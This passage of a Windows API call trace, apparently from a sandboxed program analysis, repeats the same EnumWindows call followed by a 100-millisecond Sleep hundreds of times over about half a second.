(lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.664] Sleep (dwMilliseconds=0x64) [0129.665] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.665] Sleep (dwMilliseconds=0x64) [0129.667] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.667] Sleep (dwMilliseconds=0x64) [0129.690] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.690] Sleep (dwMilliseconds=0x64) [0129.781] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.782] Sleep (dwMilliseconds=0x64) [0129.783] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.783] Sleep (dwMilliseconds=0x64) [0129.785] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.785] Sleep (dwMilliseconds=0x64) [0129.786] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.796] Sleep (dwMilliseconds=0x64) [0129.798] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.798] Sleep (dwMilliseconds=0x64) [0129.800] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.800] Sleep (dwMilliseconds=0x64) [0129.801] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.801] Sleep (dwMilliseconds=0x64) [0129.803] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.803] Sleep (dwMilliseconds=0x64) [0129.804] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.805] Sleep (dwMilliseconds=0x64) [0129.806] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.806] Sleep (dwMilliseconds=0x64) [0129.808] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.808] Sleep (dwMilliseconds=0x64) [0129.809] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.810] Sleep (dwMilliseconds=0x64) [0129.812] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.812] Sleep (dwMilliseconds=0x64) [0129.814] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.814] Sleep (dwMilliseconds=0x64) [0129.815] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.815] Sleep (dwMilliseconds=0x64) [0129.817] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.817] Sleep (dwMilliseconds=0x64) [0129.818] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.819] Sleep (dwMilliseconds=0x64) [0129.820] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.821] Sleep (dwMilliseconds=0x64) [0129.822] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.822] Sleep (dwMilliseconds=0x64) [0129.823] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.824] Sleep (dwMilliseconds=0x64) [0129.825] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.825] Sleep (dwMilliseconds=0x64) [0129.827] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.827] Sleep (dwMilliseconds=0x64) [0129.828] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.828] Sleep (dwMilliseconds=0x64) [0129.830] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.830] Sleep (dwMilliseconds=0x64) [0129.831] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.832] Sleep (dwMilliseconds=0x64) [0129.833] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.833] Sleep (dwMilliseconds=0x64) [0129.835] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.835] Sleep (dwMilliseconds=0x64) [0129.836] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.836] Sleep (dwMilliseconds=0x64) [0129.838] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.838] Sleep (dwMilliseconds=0x64) [0129.839] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.839] Sleep (dwMilliseconds=0x64) [0129.841] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.841] Sleep (dwMilliseconds=0x64) [0129.843] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.843] Sleep (dwMilliseconds=0x64) [0129.844] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.844] Sleep (dwMilliseconds=0x64) [0129.846] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.847] Sleep (dwMilliseconds=0x64) [0129.848] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.848] Sleep (dwMilliseconds=0x64) [0129.849] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.849] Sleep (dwMilliseconds=0x64) [0129.851] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.851] Sleep (dwMilliseconds=0x64) [0129.853] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.853] Sleep (dwMilliseconds=0x64) [0129.854] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.855] Sleep (dwMilliseconds=0x64) [0129.856] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.856] Sleep (dwMilliseconds=0x64) [0129.857] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.857] Sleep (dwMilliseconds=0x64) [0129.860] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.860] Sleep (dwMilliseconds=0x64) [0129.862] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.862] Sleep (dwMilliseconds=0x64) [0129.863] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.864] Sleep (dwMilliseconds=0x64) [0129.865] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.865] Sleep (dwMilliseconds=0x64) [0129.866] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.866] Sleep (dwMilliseconds=0x64) [0129.868] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.868] Sleep (dwMilliseconds=0x64) [0129.869] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.869] Sleep (dwMilliseconds=0x64) [0129.871] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.871] Sleep (dwMilliseconds=0x64) [0129.872] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.872] Sleep (dwMilliseconds=0x64) [0129.874] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.874] Sleep (dwMilliseconds=0x64) [0129.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.875] Sleep (dwMilliseconds=0x64) [0129.877] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.877] Sleep (dwMilliseconds=0x64) [0129.879] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.879] Sleep (dwMilliseconds=0x64) [0129.880] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.880] Sleep (dwMilliseconds=0x64) [0129.882] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.882] Sleep (dwMilliseconds=0x64) [0129.884] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.884] Sleep (dwMilliseconds=0x64) [0129.885] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.885] Sleep (dwMilliseconds=0x64) [0129.887] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.888] Sleep (dwMilliseconds=0x64) [0129.889] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.889] Sleep (dwMilliseconds=0x64) [0129.891] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.891] Sleep (dwMilliseconds=0x64) [0129.892] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.892] Sleep (dwMilliseconds=0x64) [0129.896] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.896] Sleep (dwMilliseconds=0x64) [0129.898] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.898] Sleep (dwMilliseconds=0x64) [0129.899] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.899] Sleep (dwMilliseconds=0x64) [0129.901] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.901] Sleep (dwMilliseconds=0x64) [0129.902] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.903] Sleep (dwMilliseconds=0x64) [0129.904] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.904] Sleep (dwMilliseconds=0x64) [0129.905] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.906] Sleep (dwMilliseconds=0x64) [0129.907] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.907] Sleep (dwMilliseconds=0x64) [0129.910] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.910] Sleep (dwMilliseconds=0x64) [0129.912] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.912] Sleep (dwMilliseconds=0x64) [0129.913] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.914] Sleep (dwMilliseconds=0x64) [0129.915] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.915] Sleep (dwMilliseconds=0x64) [0129.917] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.917] Sleep (dwMilliseconds=0x64) [0129.918] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.919] Sleep (dwMilliseconds=0x64) [0129.920] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.920] Sleep (dwMilliseconds=0x64) [0129.921] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.922] Sleep (dwMilliseconds=0x64) [0129.925] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.925] Sleep (dwMilliseconds=0x64) [0129.926] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.926] Sleep (dwMilliseconds=0x64) [0129.928] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.928] Sleep (dwMilliseconds=0x64) [0129.929] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.930] Sleep (dwMilliseconds=0x64) [0129.931] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.931] Sleep (dwMilliseconds=0x64) [0129.933] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.933] Sleep (dwMilliseconds=0x64) [0129.935] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.935] Sleep (dwMilliseconds=0x64) [0129.938] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.938] Sleep (dwMilliseconds=0x64) [0129.939] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.940] Sleep (dwMilliseconds=0x64) [0129.941] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.941] Sleep (dwMilliseconds=0x64) [0129.942] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.943] Sleep (dwMilliseconds=0x64) [0129.944] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.944] Sleep (dwMilliseconds=0x64) [0129.945] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.946] Sleep (dwMilliseconds=0x64) [0129.947] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.947] Sleep (dwMilliseconds=0x64) [0129.949] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.949] Sleep (dwMilliseconds=0x64) [0129.951] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.951] Sleep (dwMilliseconds=0x64) [0129.952] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.952] Sleep (dwMilliseconds=0x64) [0129.955] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.955] Sleep (dwMilliseconds=0x64) [0129.956] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.956] Sleep (dwMilliseconds=0x64) [0129.958] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.958] Sleep (dwMilliseconds=0x64) [0129.960] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.960] Sleep (dwMilliseconds=0x64) [0129.962] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.962] Sleep (dwMilliseconds=0x64) [0129.964] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.964] Sleep (dwMilliseconds=0x64) [0129.966] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.966] Sleep (dwMilliseconds=0x64) [0129.968] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.968] Sleep (dwMilliseconds=0x64) [0129.970] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.970] Sleep (dwMilliseconds=0x64) [0129.973] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.973] Sleep (dwMilliseconds=0x64) [0129.975] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.975] Sleep (dwMilliseconds=0x64) [0129.977] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.977] Sleep (dwMilliseconds=0x64) [0129.978] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.979] Sleep (dwMilliseconds=0x64) [0129.980] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.980] Sleep (dwMilliseconds=0x64) [0129.982] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.982] Sleep (dwMilliseconds=0x64) [0129.983] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.984] Sleep (dwMilliseconds=0x64) [0129.985] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.985] Sleep (dwMilliseconds=0x64) [0129.987] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.987] Sleep (dwMilliseconds=0x64) [0129.989] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.989] Sleep (dwMilliseconds=0x64) [0129.990] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.991] Sleep (dwMilliseconds=0x64) [0129.992] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.992] Sleep (dwMilliseconds=0x64) [0129.993] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.993] Sleep (dwMilliseconds=0x64) [0129.995] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.995] Sleep (dwMilliseconds=0x64) [0129.997] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.997] Sleep (dwMilliseconds=0x64) [0129.998] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0129.998] Sleep (dwMilliseconds=0x64) [0130.000] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.000] Sleep (dwMilliseconds=0x64) [0130.001] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.001] Sleep (dwMilliseconds=0x64) [0130.005] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.005] Sleep (dwMilliseconds=0x64) [0130.006] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.006] Sleep (dwMilliseconds=0x64) [0130.010] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.011] Sleep (dwMilliseconds=0x64) [0130.013] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.014] Sleep (dwMilliseconds=0x64) [0130.015] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.016] Sleep (dwMilliseconds=0x64) [0130.017] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.017] Sleep (dwMilliseconds=0x64) [0130.018] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.018] Sleep (dwMilliseconds=0x64) [0130.020] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.020] Sleep (dwMilliseconds=0x64) [0130.022] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.022] Sleep (dwMilliseconds=0x64) [0130.024] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.024] Sleep (dwMilliseconds=0x64) [0130.025] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.025] Sleep (dwMilliseconds=0x64) [0130.027] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.027] Sleep (dwMilliseconds=0x64) [0130.029] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.029] Sleep (dwMilliseconds=0x64) [0130.031] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.031] Sleep (dwMilliseconds=0x64) [0130.032] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.032] Sleep (dwMilliseconds=0x64) [0130.034] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.034] Sleep (dwMilliseconds=0x64) [0130.035] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.035] Sleep (dwMilliseconds=0x64) [0130.037] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.037] Sleep (dwMilliseconds=0x64) [0130.038] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.038] Sleep (dwMilliseconds=0x64) [0130.040] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.040] Sleep (dwMilliseconds=0x64) [0130.042] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.043] Sleep (dwMilliseconds=0x64) [0130.044] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.044] Sleep (dwMilliseconds=0x64) [0130.045] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.045] Sleep (dwMilliseconds=0x64) [0130.047] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.047] Sleep (dwMilliseconds=0x64) [0130.048] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.048] Sleep (dwMilliseconds=0x64) [0130.050] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.050] Sleep (dwMilliseconds=0x64) [0130.051] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.051] Sleep (dwMilliseconds=0x64) [0130.053] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.053] Sleep (dwMilliseconds=0x64) [0130.055] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.055] Sleep (dwMilliseconds=0x64) [0130.056] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.057] Sleep (dwMilliseconds=0x64) [0130.058] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.058] Sleep (dwMilliseconds=0x64) [0130.059] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.059] Sleep (dwMilliseconds=0x64) [0130.061] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.061] Sleep (dwMilliseconds=0x64) [0130.065] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.065] Sleep (dwMilliseconds=0x64) [0130.066] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.066] Sleep (dwMilliseconds=0x64) [0130.068] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.068] Sleep (dwMilliseconds=0x64) [0130.069] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.069] Sleep (dwMilliseconds=0x64) [0130.071] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.071] Sleep (dwMilliseconds=0x64) [0130.072] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.072] Sleep (dwMilliseconds=0x64) [0130.074] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.074] Sleep (dwMilliseconds=0x64) [0130.075] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.075] Sleep (dwMilliseconds=0x64) [0130.078] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.079] Sleep (dwMilliseconds=0x64) [0130.080] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.080] Sleep (dwMilliseconds=0x64) [0130.081] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.081] Sleep (dwMilliseconds=0x64) [0130.083] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.083] Sleep (dwMilliseconds=0x64) [0130.086] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.086] Sleep (dwMilliseconds=0x64) [0130.087] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.088] Sleep (dwMilliseconds=0x64) [0130.094] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.094] Sleep (dwMilliseconds=0x64) [0130.096] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.096] Sleep (dwMilliseconds=0x64) [0130.098] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.098] Sleep (dwMilliseconds=0x64) [0130.099] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.099] Sleep (dwMilliseconds=0x64) [0130.101] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.101] Sleep (dwMilliseconds=0x64) [0130.103] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.103] Sleep (dwMilliseconds=0x64) [0130.104] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.104] Sleep (dwMilliseconds=0x64) [0130.106] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.106] Sleep (dwMilliseconds=0x64) [0130.110] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.110] Sleep (dwMilliseconds=0x64) [0130.111] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.111] Sleep (dwMilliseconds=0x64) [0130.112] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.113] Sleep (dwMilliseconds=0x64) [0130.114] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.114] Sleep (dwMilliseconds=0x64) [0130.116] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.116] Sleep (dwMilliseconds=0x64) [0130.118] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.118] Sleep (dwMilliseconds=0x64) [0130.123] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.123] Sleep (dwMilliseconds=0x64) [0130.124] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.125] Sleep (dwMilliseconds=0x64) [0130.126] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.126] Sleep (dwMilliseconds=0x64) [0130.128] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.128] Sleep (dwMilliseconds=0x64) [0130.129] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.129] Sleep (dwMilliseconds=0x64) [0130.131] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.131] Sleep (dwMilliseconds=0x64) [0130.134] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.135] Sleep (dwMilliseconds=0x64) [0130.136] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.136] Sleep (dwMilliseconds=0x64) [0130.138] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.138] Sleep (dwMilliseconds=0x64) [0130.140] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.140] Sleep (dwMilliseconds=0x64) [0130.142] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.142] Sleep (dwMilliseconds=0x64) [0130.144] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.144] Sleep (dwMilliseconds=0x64) [0130.145] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.145] Sleep (dwMilliseconds=0x64) [0130.147] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.147] Sleep (dwMilliseconds=0x64) [0130.148] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.148] Sleep (dwMilliseconds=0x64) [0130.150] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.150] Sleep (dwMilliseconds=0x64) [0130.151] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.151] Sleep (dwMilliseconds=0x64) [0130.153] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.153] Sleep (dwMilliseconds=0x64) [0130.155] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.155] Sleep (dwMilliseconds=0x64) [0130.159] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.159] Sleep (dwMilliseconds=0x64) [0130.161] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.161] Sleep (dwMilliseconds=0x64) [0130.163] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.163] Sleep (dwMilliseconds=0x64) [0130.164] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.165] Sleep (dwMilliseconds=0x64) [0130.166] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.167] Sleep (dwMilliseconds=0x64) [0130.168] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.168] Sleep (dwMilliseconds=0x64) [0130.170] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.170] Sleep (dwMilliseconds=0x64) [0130.171] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.172] Sleep (dwMilliseconds=0x64) [0130.173] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.174] Sleep (dwMilliseconds=0x64) [0130.175] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.175] Sleep (dwMilliseconds=0x64) [0130.176] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.177] Sleep (dwMilliseconds=0x64) [0130.179] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.179] Sleep (dwMilliseconds=0x64) [0130.181] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.181] Sleep (dwMilliseconds=0x64) [0130.185] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.185] Sleep (dwMilliseconds=0x64) [0130.186] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.187] Sleep (dwMilliseconds=0x64) [0130.189] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.189] Sleep (dwMilliseconds=0x64) [0130.191] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.191] Sleep (dwMilliseconds=0x64) [0130.193] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.193] Sleep (dwMilliseconds=0x64) [0130.194] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.195] Sleep (dwMilliseconds=0x64) [0130.196] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.196] Sleep (dwMilliseconds=0x64) [0130.198] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.198] Sleep (dwMilliseconds=0x64) [0130.200] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.200] Sleep (dwMilliseconds=0x64) [0130.201] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.201] Sleep (dwMilliseconds=0x64) [0130.203] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.203] Sleep (dwMilliseconds=0x64) [0130.205] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.205] Sleep (dwMilliseconds=0x64) [0130.207] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.207] Sleep (dwMilliseconds=0x64) [0130.208] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.209] Sleep (dwMilliseconds=0x64) [0130.212] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.212] Sleep (dwMilliseconds=0x64) [0130.213] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.214] Sleep (dwMilliseconds=0x64) [0130.215] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.215] Sleep (dwMilliseconds=0x64) [0130.217] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.217] Sleep (dwMilliseconds=0x64) [0130.218] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0130.218] Sleep (dwMilliseconds=0x64) [0130.220] EnumWindows 